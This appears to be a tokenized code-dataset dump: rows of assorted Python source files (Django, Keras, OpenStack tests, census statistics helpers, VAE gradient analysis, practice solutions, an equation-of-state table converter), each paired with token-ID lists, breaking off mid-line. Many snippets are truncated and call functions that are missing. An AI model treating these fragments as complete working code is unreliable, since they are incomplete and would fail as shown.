content
stringlengths
1
1.05M
input_ids
listlengths
1
883k
ratio_char_token
float64
1
22.9
token_count
int64
1
883k
# coding=utf-8 # Copyright 2021 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Unit tests for title_word_order_optimizer.""" from absl.testing import parameterized import unittest.mock as mock from optimizers_builtin import title_word_order_optimizer from test_data import requests_bodies from util import app_util import constants # GPC ID IS 201 _PROPER_GPC_CATEGORY_EN = 'Apparel & Accessories > Jewelry > Watches' # GPC ID is 201 _PROPER_GPC_CATEGORY_JA = (' > ' ' > ') # GPC ID is 5598 _GPC_CATEGORY_LEVEL_4_JA = (' > ' ' > > ' '') _MAX_WMM_MOVE_THRESHOLD_EN = 25 _MAX_WMM_MOVE_THRESHOLD_JA = 12
[ 2, 19617, 28, 40477, 12, 23, 198, 2, 15069, 33448, 3012, 11419, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351,...
2.685969
449
from django.contrib.auth.models import User from django.db import models from django.utils.timezone import now
[ 6738, 42625, 14208, 13, 3642, 822, 13, 18439, 13, 27530, 1330, 11787, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 42625, 14208, 13, 26791, 13, 2435, 11340, 1330, 783, 628, 628, 628, 628, 198 ]
3.305556
36
from keras.models import Sequential from keras.layers import Dense, Dropout
[ 6738, 41927, 292, 13, 27530, 1330, 24604, 1843, 198, 6738, 41927, 292, 13, 75, 6962, 1330, 360, 1072, 11, 14258, 448, 628 ]
3.5
22
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import random from unittest import mock import uuid from cinderclient import api_versions from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes from openstackclient.tests.unit import fakes from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes from openstackclient.tests.unit import utils from openstackclient.tests.unit.volume.v2 import fakes as volume_v2_fakes # TODO(stephenfin): Check if the responses are actually the same FakeVolume = volume_v2_fakes.FakeVolume FakeVolumeType = volume_v2_fakes.FakeVolumeType
[ 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 345, 743, 198, 2, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 921, 743, 7330, 198, 2, 257, 4866, 286, 262, 13789, 379, 198, 2,...
3.560897
312
# Licensed under a 3-clause BSD style license - see LICENSE.rst from __future__ import absolute_import, division, print_function, unicode_literals import numpy as np from numpy.testing import assert_allclose from astropy.coordinates import Angle from astropy.tests.helper import pytest, assert_quantity_allclose from astropy.units import Quantity from astropy.wcs import WCS from ...utils.testing import requires_dependency, requires_data from ...datasets import FermiGalacticCenter from ...image import make_header from ...irf import EnergyDependentTablePSF from ...spectrum.powerlaw import power_law_evaluate from .. import SkyCube, compute_npred_cube, convolve_cube def make_test_cubes(energies, nxpix, nypix, binsz): """Makes exposure and spectral cube for tests. Parameters ---------- energies : `~astropy.units.Quantity` Quantity 1D array of energies of cube layers nxpix : int Number of pixels in x-spatial direction nypix : int Number of pixels in y-spatial direction binsz : float Spatial resolution of cube, in degrees per pixel Returns ------- exposure_cube : `~gammapy.sky_cube.SkyCube` Cube of uniform exposure = 1 cm^2 s sky_cube : `~gammapy.sky_cube.SkyCube` Cube of differential fluxes in units of cm^-2 s^-1 GeV^-1 sr^-1 """ header = make_header(nxpix, nypix, binsz) header['NAXIS'] = 3 header['NAXIS3'] = len(energies) header['CDELT3'] = 1 header['CRVAL3'] = 1 header['CRPIX3'] = 1 wcs = WCS(header) data_array = np.ones((len(energies), 10, 10)) exposure_cube = SkyCube(data=Quantity(data_array, 'cm2 s'), wcs=wcs, energy=energies) flux = power_law_evaluate(energies.value, 1, 2, 1) flux = Quantity(flux, '1/(cm2 s GeV sr)') flux_array = np.zeros_like(data_array) for i in np.arange(len(flux)): flux_array[i] = flux.value[i] * data_array[i] sky_cube = SkyCube(data=Quantity(flux_array, flux.unit), wcs=wcs, energy=energies) return exposure_cube, sky_cube
[ 2, 49962, 739, 257, 513, 12, 565, 682, 347, 10305, 3918, 5964, 532, 766, 38559, 24290, 13, 81, 301, 198, 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 11, 7297, 11, 3601, 62, 8818, 11, 28000, 1098, 62, 17201, 874, 198, 11748, 299,...
2.56044
819
# Generated by Django 2.2.16 on 2020-12-13 02:28 from django.db import migrations
[ 2, 2980, 515, 416, 37770, 362, 13, 17, 13, 1433, 319, 12131, 12, 1065, 12, 1485, 7816, 25, 2078, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.8
30
### A module containing various utilities used at various points throughout the processes of submitting and analyzing problems ### import os import json import subprocess import hashlib import sys import random import string from .output_processor import process_output from . import code_templates def make_file(path, code, problem_data): """Function to create script that is used for verification and profiling purposes Returns nothing, writes to disk""" ctemps = code_templates.get_ctemp_dict() program_text = code input_type = list(problem_data["metadata"]["input_type"].keys())[0] main_function = problem_data["metadata"]["main_function"] init_data = problem_data["init_data"] is_init_data = problem_data["metadata"]["init_data"] is_inputs = problem_data["metadata"]["inputs"] with open(path, 'w') as f: write_prequel(f) for line in program_text: split_line = line.split() if len(split_line) > 0 and line.split()[0] == "def": func_name = line.split()[1].split("(")[0] if func_name == main_function: fname = func_name f.write("{0}\n".format(line)) if not line.endswith("\n"): f.write("\n") write_sequel(f, fname) def gen_sample_outputs(filename, problem_data, init_data=None, input_type="default"): """Utility function invoked whenever a reference problem is submitted Returns a list of outputs that are subsequently stored in DB as field associated with given problem""" inputs = problem_data["inputs"] platform = sys.platform.lower() SAMPUP_TIMEOUT = "8" SAMPUP_MEMOUT = "1000" timeout_cmd = "gtimeout {0}".format(SAMPUP_TIMEOUT) if platform == "darwin" else "timeout {0} -m {1}".format(SAMPUP_TIMEOUT, SAMPUP_MEMOUT) if platform == "linux" or platform == "linux2" else "" base_cmd = "{0} python".format(timeout_cmd) outputs = [] if input_type == "default": programmatic_inputs = inputs if inputs is not None: for inp in programmatic_inputs: input_arg = json.dumps(inp) output = process_output(base_cmd, filename, input_arg=input_arg, init_data=init_data) ### uncomment below line for debugging # print("CSO =>", cleaned_split_output) outputs.append(output) else: output = process_output(base_cmd, filename, init_data=init_data) ### uncomment below line for debugging # print("CSO =>", cleaned_split_output) outputs.append(output) elif input_type == "file": for script in inputs: output = process_output(base_cmd, filename, input_arg=script, init_data=init_data) ### uncomment below line for debugging # print("CSO =>", cleaned_split_output) outputs.append(output) try: os.remove(script) except: pass return outputs def generate_input(input_type, input_length, num_tests): """Self-explanatory utility function that generates test input for a submitted reference problem based on metadata specifications Returns jsonified list of inputs""" global_inputs = [] for i in range(num_tests): if input_type == "integer": inp_list = [random.randint(1, 1000) for x in range(input_length)] elif input_type == "float": inp_list = [round(random.uniform(0.0, 1000.0), 2) for x in range(input_length)] elif input_type == "string": inp_list = [random_string(random.randint(1, 10)) for x in range(input_length)] global_inputs.append(inp_list) return global_inputs
[ 21017, 317, 8265, 7268, 2972, 20081, 973, 379, 2972, 2173, 3690, 262, 7767, 286, 24353, 290, 22712, 2761, 44386, 198, 198, 11748, 28686, 198, 11748, 33918, 198, 11748, 850, 14681, 198, 11748, 12234, 8019, 198, 11748, 25064, 198, 11748, 47...
2.469079
1,520
from __future__ import division from collections import OrderedDict from sqlalchemy import create_engine, MetaData, func from sqlalchemy.orm import sessionmaker, class_mapper from django.conf import settings from django.db.backends.base.creation import TEST_DATABASE_PREFIX from django.db import connection if settings.TESTING: # Hack to ensure the sqlalchemy database name matches the Django one # during testing url = settings.DATABASE_URL parts = url.split("/") # use the test database name db_name = connection.settings_dict.get('TEST', {}).get('NAME') if db_name is None: db_name = TEST_DATABASE_PREFIX + parts[-1] parts[-1] = db_name url = '/'.join(parts) _engine = create_engine(url) else: _engine = create_engine(settings.DATABASE_URL) # See http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions naming_convention = { "ix": 'ix_%(column_0_label)s', "uq": "uq_%(table_name)s_%(column_0_name)s", "ck": "ck_%(table_name)s_%(constraint_name)s", "fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s", "pk": "pk_%(table_name)s" } _metadata = MetaData(bind=_engine, naming_convention=naming_convention) _Session = sessionmaker(bind=_engine) def capitalize(s): """ Capitalize the first char of a string, without affecting the rest of the string. This differs from `str.capitalize` since the latter also lowercases the rest of the string. """ if not s: return s return ''.join([s[0].upper(), s[1:]]) def percent(num, denom, places=2): if denom == 0: return 0 else: return round(num / denom * 100, places) def ratio(num, denom, places=2): if denom == 0: return 0 else: return round(num / denom, places) def add_metadata(data, table): if 'metadata' not in data: data['metadata'] = {} # this might be a SQLAlchemy model that is linked back to # a data table if hasattr(table, 'data_tables'): table = table.data_tables[0] data['metadata']['table_id'] = table.id if table.universe: data['metadata']['universe'] = table.universe if table.year: data['metadata']['year'] = table.year # dictionaries that merge_dicts will merge MERGE_KEYS = set(['values', 'numerators', 'error']) def calculate_median(objects, field_name): ''' Calculates the median where obj.total is the distribution count and getattr(obj, field_name) is the distribution segment. Note: this function assumes the objects are sorted. ''' total = 0 for obj in objects: total += obj.total half = total / 2.0 counter = 0 for i, obj in enumerate(objects): counter += obj.total if counter > half: if counter - half == 1: # total must be even (otherwise counter - half ends with .5) return (float(getattr(objects[i - 1], field_name)) + float(getattr(obj, field_name))) / 2.0 return float(getattr(obj, field_name)) elif counter == half: # total must be even (otherwise half ends with .5) return (float(getattr(obj, field_name)) + float(getattr(objects[i + 1], field_name))) / 2.0 def calculate_median_stat(stats): ''' Calculates the stat (key) that lies at the median for stat data from the output of get_stat_data. Note: this function assumes the objects are sorted. ''' total = 0 keys = [k for k in stats.iterkeys() if k != 'metadata'] total = sum(stats[k]['numerators']['this'] for k in keys) half = total / 2.0 counter = 0 for key in keys: counter += stats[key]['numerators']['this'] if counter >= half: return key def merge_dicts(this, other, other_key): ''' Recursively merges 'other' dict into 'this' dict. In particular it merges the leaf nodes specified in MERGE_KEYS. ''' for key, values in this.iteritems(): if key in MERGE_KEYS: if key in other: values[other_key] = other[key]['this'] elif isinstance(values, dict): merge_dicts(values, other[key], other_key) def group_remainder(data, num_items=4, make_percentage=True, remainder_name="Other"): ''' This function assumes data is an OrderedDict instance. It iterates over the dict items, grouping items with index >= num_items - 1 together under key remainder_name. If make_percentage = True, the 'values' dict contains percentages and the 'numerators' dict the totals. Otherwise 'values' contains the totals. ''' num_key = 'numerators' if make_percentage else 'values' total_all = dict((k, 0.0) for k in data.values()[0][num_key].keys()) total_other = total_all.copy() other_dict = { "name": remainder_name, "error": {"this": 0.0}, "numerator_errors": {"this": 0.0}, num_key: total_other, } cutoff = num_items - 2 for i, (key, values) in enumerate(data.items()): if key == 'metadata': continue for k, v in values[num_key].iteritems(): total_all[k] += v if i > cutoff: del data[key] data.setdefault(remainder_name, other_dict) for k, v in values[num_key].iteritems(): total_other[k] += v if make_percentage: for key, values in data.iteritems(): if key != 'metadata': values['values'] = dict((k, percent(v, total_all[k])) for k, v in values['numerators'].iteritems()) def get_objects_by_geo(db_model, geo, session, fields=None, order_by=None, only=None, exclude=None, data_table=None): """ Get rows of statistics from the stats mode +db_model+ for a particular geography, summing over the 'total' field and grouping by +fields+. Filters to include +only+ and ignore +exclude+, if given. """ data_table = data_table or db_model.data_tables[0] if fields is None: fields = [c.key for c in class_mapper(db_model).attrs if c.key not in ['geo_code', 'geo_level', 'geo_version', 'total']] fields = [getattr(db_model, f) for f in fields] objects = session\ .query(func.sum(db_model.total).label('total'), *fields)\ .group_by(*fields)\ .filter(db_model.geo_code == geo.geo_code)\ .filter(db_model.geo_level == geo.geo_level)\ .filter(db_model.geo_version == geo.version) if only: for k, v in only.iteritems(): objects = objects.filter(getattr(db_model, k).in_(v)) if exclude: for k, v in exclude.iteritems(): objects = objects.filter(getattr(db_model, k).notin_(v)) if order_by is not None: attr = order_by is_desc = False if order_by[0] == '-': is_desc = True attr = attr[1:] if attr == 'total': if is_desc: attr = attr + ' DESC' else: attr = getattr(db_model, attr) if is_desc: attr = attr.desc() objects = objects.order_by(attr) objects = objects.all() if len(objects) == 0: raise LocationNotFound("%s for geography %s version '%s' not found" % (db_model.__table__.name, geo.geoid, geo.version)) return objects def get_stat_data(fields, geo, session, order_by=None, percent=True, total=None, table_fields=None, table_name=None, only=None, exclude=None, exclude_zero=False, recode=None, key_order=None, table_dataset=None, percent_grouping=None, slices=None): """ This is our primary helper routine for building a dictionary suitable for a place's profile page, based on a statistic. It sums over the data for ``fields`` in the database for the place identified by ``geo`` and calculates numerators and values. If multiple fields are given, it creates nested result dictionaries. Control the rows that are included or ignored using ``only``, ``exclude`` and ``exclude_zero``. The field values can be recoded using ``recode`` and and re-ordered using ``key_order``. :param fields: the census field to build stats for. Specify a list of fields to build nested statistics. If multiple fields are specified, then the values of parameters such as ``only``, ``exclude`` and ``recode`` will change. These must be fields in `api.models.census.census_fields`, e.g. 'highest educational level' :type fields: str or list :param geo: the geograhy object :param dbsession session: sqlalchemy session :param str order_by: field to order by, or None for default, eg. '-total' :param bool percent: should we calculate percentages, or just sum raw values? :param list percent_grouping: when calculating percentages, which fields should rows be grouped by? Default: none of them -- calculate each entry as a percentage of the whole dataset. Ignored unless ``percent`` is ``True``. :param list table_fields: list of fields to use to find the table, defaults to `fields` :param int total: the total value to use for percentages, or None to total columns automatically :param str table_name: override the table name, otherwise it's calculated from the fields and geo_level :param list only: only include these field values. If ``fields`` has many items, this must be a dict mapping field names to a list of strings. :type only: dict or list :param exclude: ignore these field values. If ``fields`` has many items, this must be a dict mapping field names to a list of strings. Field names are checked before any recoding. :type exclude: dict or list :param bool exclude_zero: ignore fields that have a zero or null total :param recode: function or dict to recode values of ``key_field``. If ``fields`` is a singleton, then the keys of this dict must be the values to recode from, otherwise they must be the field names and then the values. If this is a lambda, it is called with the field name and its value as arguments. :type recode: dict or lambda :param key_order: ordering for keys in result dictionary. If ``fields`` has many items, this must be a dict from field names to orderings. The default ordering is determined by ``order``. :type key_order: dict or list :param str table_dataset: dataset used to help find the table if ``table_name`` isn't given. :param list slices: return only a slice of the final data, by choosing a single value for each field in the field list, as specified in the slice list. :return: (data-dictionary, total) """ from .tables import FieldTable if not isinstance(fields, list): fields = [fields] n_fields = len(fields) many_fields = n_fields > 1 if order_by is None: order_by = fields[0] if only is not None: if not isinstance(only, dict): if many_fields: raise ValueError("If many fields are given, then only must be a dict. I got %s instead" % only) else: only = {fields[0]: set(only)} if exclude is not None: if not isinstance(exclude, dict): if many_fields: raise ValueError("If many fields are given, then exclude must be a dict. I got %s instead" % exclude) else: exclude = {fields[0]: set(exclude)} if key_order: if not isinstance(key_order, dict): if many_fields: raise ValueError("If many fields are given, then key_order must be a dict. I got %s instead" % key_order) else: key_order = {fields[0]: key_order} else: key_order = {} if recode: if not isinstance(recode, dict) or not many_fields: recode = dict((f, recode) for f in fields) table_fields = table_fields or fields # get the table and the model if table_name: data_table = FieldTable.get(table_name) else: data_table = FieldTable.for_fields(table_fields, table_dataset) if not data_table: ValueError("Couldn't find a table that covers these fields: %s" % table_fields) objects = get_objects_by_geo(data_table.model, geo, session, fields=fields, order_by=order_by, only=only, exclude=exclude, data_table=data_table) if total is not None and many_fields: raise ValueError("Cannot specify a total if many fields are given") if total and percent_grouping: raise ValueError("Cannot specify a total if percent_grouping is given") if total is None and percent and data_table.total_column is None: # The table doesn't support calculating percentages, but the caller # has asked for a percentage without providing a total value to use. # Either specify a total, or specify percent=False raise ValueError("Asking for a percent on table %s that doesn't support totals and no total parameter specified." % data_table.id) # sanity check the percent grouping if percent: if percent_grouping: for field in percent_grouping: if field not in fields: raise ValueError("Field '%s' specified in percent_grouping must be in the fields list." % field) # re-order percent grouping to be same order as in the field list percent_grouping = [f for f in fields if f in percent_grouping] else: percent_grouping = None denominator_key = getattr(data_table, 'denominator_key') root_data = OrderedDict() running_total = 0 group_totals = {} grand_total = -1 def get_data_object(obj): """ Recurse down the list of fields and return the final resting place for data for this stat. """ data = root_data for i, field in enumerate(fields): key = getattr(obj, field) if recode and field in recode: key = get_recoded_key(recode, field, key) else: key = capitalize(key) # enforce key ordering the first time we see this field if (not data or data.keys() == ['metadata']) and field in key_order: for fld in key_order[field]: data[fld] = OrderedDict() # ensure it's there if key not in data: data[key] = OrderedDict() data = data[key] # default values for intermediate fields if data is not None and i < n_fields - 1: data['metadata'] = {'name': key} # data is now the dict where the end value is going to go if not data: data['name'] = key data['numerators'] = {'this': 0.0} return data # run the stats for the objects for obj in objects: if not obj.total and exclude_zero: continue if denominator_key and getattr(obj, data_table.fields[-1]) == denominator_key: grand_total = obj.total # don't include the denominator key in the output continue # get the data dict where these values must go data = get_data_object(obj) if not data: continue if obj.total is not None: data['numerators']['this'] += obj.total running_total += obj.total else: # TODO: sanity check this is the right thing to do for multiple fields with # nested nulls -- does aggregating over nulls treat them as zero, or should we # treat them as null? data['numerators']['this'] = None if percent_grouping: if obj.total is not None: group_key = tuple() for field in percent_grouping: key = getattr(obj, field) if recode and field in recode: # Group by recoded keys key = get_recoded_key(recode, field, key) group_key = group_key + (key,) data['_group_key'] = group_key group_totals[group_key] = group_totals.get(group_key, 0) + obj.total if grand_total == -1: grand_total = running_total if total is None else total # add in percentages calc_percent(root_data) if slices: for v in slices: root_data = root_data[v] add_metadata(root_data, data_table) return root_data, grand_total
[ 6738, 11593, 37443, 834, 1330, 7297, 198, 6738, 17268, 1330, 14230, 1068, 35, 713, 198, 198, 6738, 44161, 282, 26599, 1330, 2251, 62, 18392, 11, 30277, 6601, 11, 25439, 198, 6738, 44161, 282, 26599, 13, 579, 1330, 6246, 10297, 11, 1398,...
2.398057
7,102
from time import time from typing import * import torch from booster import Diagnostic from torch import Tensor from tqdm import tqdm from .utils import cosine, percentile, RunningMean, RunningVariance from ..estimators import GradientEstimator from ..models import TemplateModel def get_grads_from_tensor(model: TemplateModel, loss: Tensor, output: Dict[str, Tensor], tensor_id: str, mc: int, iw: int): """ Compute the gradients given a `tensor` on which was called `tensor.retain_graph()` Assumes `tensor` to have `tensor.shape[0] == bs * iw * mc` :param model: VAE model :param loss: loss value :param output: model's output: dict :param tensor_id: key of the tensor in the model output :param mc: number of outer Monte-Carlo samples :param iw: number of inner Importance-Weighted samples :return: gradient: Tensor of shape [D,] where D is the number of elements in `tensor` """ assert tensor_id in output.keys(), f"Tensor_id = `{tensor_id}` not in model's output" model.zero_grad() loss.sum().backward(create_graph=True, retain_graph=True) # get the tensor of interest tensors = output[tensor_id] if isinstance(output[tensor_id], list) else output[tensor_id] bs = tensors[0].shape[0] // (mc * iw) # get the gradients, flatten and concat across the feature dimension gradients = [p.grad for p in tensors] assert not any( [g is None for g in gradients]), f"{sum([int(g is None) for g in gradients])} tensors have no gradients. " \ f"Use `tensor.retain_graph()` in your model to enable gradients. " \ f"tensor_id = `{tensor_id}`" # compute gradients estimate for each individual grads # sum individual gradients because x_expanded = x.expand(bs, mc, iw) gradients = torch.cat([g.view(bs, mc * iw, -1).sum(1) for g in gradients], 1) # return an MC average of the grads return gradients.mean(0) def get_grads_from_parameters(model: TemplateModel, loss: Tensor, key_filter: str = ''): """ Return the gradients for the parameters matching the `key_filter` :param model: VAE model :param loss: loss value :param key_filter: filter value (comma separated values accepted (e.g. "A,b")) :return: Tensor of shape [D,] where `D` is the number of parameters """ key_filters = key_filter.split(',') params = [p for k, p in model.named_parameters() if any([(_key in k) for _key in key_filters])] assert len(params) > 0, f"No parameters matching filter = `{key_filters}`" model.zero_grad() # backward individual gradients \nabla L[i] loss.mean().backward(create_graph=True, retain_graph=True) # gather gradients for each parameter and concat such that each element across the dim 1 is a parameter grads = [p.grad.view(-1) for p in params if p.grad is not None] return torch.cat(grads, 0) def get_gradients_statistics(estimator: GradientEstimator, model: TemplateModel, x: Tensor, mc_samples: int = 100, key_filter: str = 'inference_network', oracle_grad: Optional[Tensor] = None, return_grads: bool = False, compute_dsnr: bool = True, samples_per_batch: Optional[int] = None, eps: float = 1e-15, tqdm: Callable = tqdm, **config: Dict) -> Tuple[Diagnostic, Dict]: """ Compute the gradients and return the statistics (Variance, Magnitude, SNR, DSNR) If an `oracle` gradient is available: compute the cosine similarity with the oracle and the gradient estimate (direction) The Magnitude, Variance and SNR are defined parameter-wise. All return values are average over the D parameters with Variance > eps. For instance, the returned SNR is * SNR = 1/D \sum_d SNR_d Each MC sample is computed sequentially and the mini-batch `x` will be split into chuncks if a value `samples_per_batch` if specified and if `samples_per_batch < x.size(0) * mc * iw`. :param estimator: Gradient Estimator :param model: VAE model :param x: mini-batch of observations :param mc_samples: number of Monte-Carlo samples :param key_filter: key matching parameters names in the model :param oracle_grad: true direction of the gradients [Optional] :param return_grads: return all gradients in the `meta` output directory if set to `True` :param compute_dsnr: compute the Directional SNR if set to `True` :param samples_per_batch: max. number of individual samples `bs * mc * iw` per mini-batch [Optional] :param eps: minimum Variance value used for filtering :param config: config dictionary for the estimator :param tqdm: custom `tqdm` function :return: output : Diagnostic = {'grads' : {'variance': .., 'magnitude': .., 'snr': .., 'dsnr' .., 'direction': cosine similarity with the oracle, 'keep_ratio' : ratio of parameter-wise gradients > epsilon}} 'snr': {'percentiles', 'mean', 'min', 'max'} }, meta : additional data including the gradients values if `return_grads` """ _start = time() grads_dsnr = None grads_mean = RunningMean() grads_variance = RunningVariance() if oracle_grad is not None: grads_dir = RunningMean() all_grads = None # compute each MC sample sequentially for i in tqdm(range(mc_samples), desc="Gradients Analysis"): # compute number of chuncks based on the capacity `samples_per_batch` if samples_per_batch is None: chuncks = 1 else: bs = x.size(0) mc = estimator.config['mc'] iw = estimator.config['iw'] # infer number of chunks total_samples = bs * mc * iw chuncks = max(1, -(-total_samples // samples_per_batch)) # ceiling division # compute mini-batch gradient by chunck if `x` is large gradients = RunningMean() for k, x_ in enumerate(x.chunk(chuncks, dim=0)): model.eval() model.zero_grad() # forward, backward to compute the gradients loss, diagnostics, output = estimator(model, x_, backward=False, **config) # gather mini-batch gradients if 'tensor:' in key_filter: tensor_id = key_filter.replace("tensor:", "") gradients_ = get_grads_from_tensor(model, loss, output, tensor_id, estimator.mc, estimator.iw) else: gradients_ = get_grads_from_parameters(model, loss, key_filter=key_filter) # move to cpu gradients_ = gradients_.detach().cpu() # update average gradients.update(gradients_, k=x_.size(0)) # gather statistics with torch.no_grad(): gradients = gradients() if return_grads or compute_dsnr: all_grads = gradients[None] if all_grads is None else torch.cat([all_grads, gradients[None]], 0) grads_mean.update(gradients) grads_variance.update(gradients) # compute the statistics with torch.no_grad(): # compute statistics for each data point `x_i` grads_variance = grads_variance() grads_mean = grads_mean() # compute signal-to-noise ratio. see `tighter variational bounds are not necessarily better` (eq. 4) grad_var_sqrt = grads_variance.pow(0.5) clipped_variance_sqrt = grad_var_sqrt.clamp(min=eps) grads_snr = grads_mean.abs() / (clipped_variance_sqrt) # compute DSNR, see `tighter variational bounds are not necessarily better` (eq. 12) if compute_dsnr: u = all_grads.mean(0, keepdim=True) u /= u.norm(dim=1, keepdim=True, p=2) g_parallel = u * (u * all_grads).sum(1, keepdim=True) g_perpendicular = all_grads - g_parallel grads_dsnr = g_parallel.norm(dim=1, p=2) / (eps + g_perpendicular.norm(dim=1, p=2)) # compute grad direction: cosine similarity between the gradient estimate and the oracle if oracle_grad is not None: grads_dir = cosine(grads_mean, oracle_grad, dim=-1) # reinitialize grads model.zero_grad() # reduce fn: keep only parameter with variance > 0 mask = (grads_variance > eps).float() _reduce = lambda x: (x * mask).sum() / mask.sum() output = Diagnostic({'grads': { 'variance': _reduce(grads_variance), 'magnitude': _reduce(grads_mean.abs()), 'snr': _reduce(grads_snr), 'dsnr': grads_dsnr.mean() if grads_dsnr is not None else 0., 'keep_ratio': mask.sum() / torch.ones_like(mask).sum() }, 'snr': { 'p25': percentile(grads_snr, q=0.25), 'p50': percentile(grads_snr, q=0.50), 'p75': percentile(grads_snr, q=0.75), 'p5': percentile(grads_snr, q=0.05), 'p95': percentile(grads_snr, q=0.95), 'min': grads_snr.min(), 'max': grads_snr.max(), 'mean': grads_snr.mean()} }) if oracle_grad is not None: output['grads']['direction'] = grads_dir.mean() # additional data: raw grads, and mean,var,snr for each parameter separately meta = { 'grads': all_grads, 'expected': grads_mean, 'magnitude': grads_mean.abs(), 'var': grads_variance, 'snr': grads_snr, } return output, meta
[ 6738, 640, 1330, 640, 198, 6738, 19720, 1330, 1635, 198, 198, 11748, 28034, 198, 6738, 30430, 1330, 31549, 15132, 198, 6738, 28034, 1330, 309, 22854, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 198, 6738, 764, 26791, 1330, 861...
2.251931
4,402
if __name__ == '__main__': main()
[ 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1388, 3419 ]
2.166667
18
# -*- coding: utf-8 -*- import re # from pyltp import Segmentor import jieba.posseg as pseg import jieba import os import sys import json import math # import kenlm import nltk from collections import Counter # dataSplit('TNewsSegafter2.txt', 32) dataSplit('TNewsSegafter1.txt', 32)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 302, 198, 2, 422, 12972, 2528, 79, 1330, 1001, 5154, 273, 198, 11748, 474, 494, 7012, 13, 1930, 325, 70, 355, 15838, 70, 198, 11748, 474, 494, 7012, 198, 11748,...
2.75
104
""" Practice problems, Python fundamentals 1 -- Solutions @authors: Balint Szoke, Daniel Csaba @date: 06/02/2017 """ #------------------------------------------------------- # 1) Solution good_string = "Sarah's code" #or good_string = """Sarah's code""" #------------------------------------------------------- # 2) Solution i = 1234 list(str(i)) #------------------------------------------------------- # 3) Solution year = '2016' next_year = str(int(year) + 1) #------------------------------------------------------- # 4) Solution x, y = 3, 'hello' print(x, y) z = x x = y y = z print(x, y) #------------------------------------------------------- # 5) Solution name = 'Jones' print(name.upper()) #------------------------------------------------------- # 6) Solution name = 'Ulysses' print(name.count('s')) #------------------------------------------------------- # 7) Solution long_string = 'salamandroid' long_string = long_string.replace('a', '*') print(long_string) #------------------------------------------------------- # 8) Solution ll = [1, 2, 3, 4, 5] ll.reverse() print(ll) #ll.pop(1) # or better ll.pop(ll.index(4)) print(ll) ll.append(1.5) print(ll) ll.sort() print(ll) #%% #------------------------------------------------------- # 9) Solution number = "32,054.23" number_no_comma = number.replace(',', '') number_float = float(number_no_comma) print(number_float) #or print(float(number.replace(',', ''))) #------------------------------------------------------- # 10) Solution firstname_lastname = 'john_doe' firstname, lastname = firstname_lastname.split('_') Firstname = firstname.capitalize() Lastname = lastname.capitalize() print(Firstname, Lastname) #------------------------------------------------------- # 11-12) Solution l = [0, 1, 2, 4, 5] index = l.index(4) l.insert(index, 3) print(l) #------------------------------------------------------- # 13) Solution s = 'www.example.com' s = s.lstrip('w.') s = s.rstrip('.c') # or in a single line (s.lstrip('w.')).rstrip('.com') #------------------------------------------------------- # 14) Solution link = 'https://play.spotify.com/collection/albums' splitted_link = link.rsplit('/', 1) print(splitted_link[0]) #or link.rsplit('/', 1)[0] #------------------------------------------------------- # 15) Solution amount = "32.054,23" ms = amount.maketrans(',.', '.,') amount = amount.translate(ms) print(amount)
[ 37811, 198, 49515, 501, 2761, 11, 11361, 33099, 352, 1377, 23555, 198, 198, 31, 41617, 25, 8528, 600, 27974, 2088, 11, 7806, 327, 82, 15498, 198, 31, 4475, 25, 9130, 14, 2999, 14, 5539, 198, 37811, 198, 198, 2, 3880, 19351, 6329, 22...
3.133848
777
""" This is a python script that converts u(rho, T), P(rho, T), Cs(rho,T), S(rho, T) to T(rho, u), P(rho, u), Cs(rho, u), S(rho, u), which is more useful for SPH calculations """ import matplotlib.pyplot as plt from collections import OrderedDict import numpy as np import pandas as pd import csv import sys from scipy.interpolate import interp1d from scipy import interpolate def recalculateEnergies(d, grid_number, min_energy, delta): """ For each density sample, we want the same exponential energy grid :param d: :param grid_number: :param min_energy: :param delta: :return: """ densities = d.keys() new_energies = [] for i in range(0, grid_number): new_energy = min_energy * (delta**i) new_energies.append(new_energy) for i in densities: d[i].update({'Energy (J/kg)': new_energies}) return d nu = 120 # number of the grid for the internal energy (exponential) infile_path = 'granite.table.csv' empty_lines = emptyLineIndices(f=infile_path) sorted_dict = chunkFile(f=infile_path, emtpy_lines=empty_lines) densities = sorted_dict.keys() infile_df = pd.read_csv(infile_path) energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])] min_energy = min(energy) max_energy = max(energy) delta = (min_energy / max_energy)**(1/(nu-1)) sorted_dict = recalculateEnergies(d=sorted_dict, grid_number=nu, min_energy=min_energy, delta=delta) for i in densities: energies = sorted_dict[i]['Energy (J/kg)'] temperatures = sorted_dict[i]['Temperature (K)'] pressures = sorted_dict[i]['Pressure (Pa)'] sound_speeds = sorted_dict[i]['Sound speed (m/s)'] entropies = sorted_dict[i]['Entropy (J/kg/K)'] f_temperature = interpolate.interp1d(energies, temperatures, kind='linear', fill_value='extrapolate') sorted_dict[i].update({'Temperature (K)': f_temperature(energies)}) f_pressure = 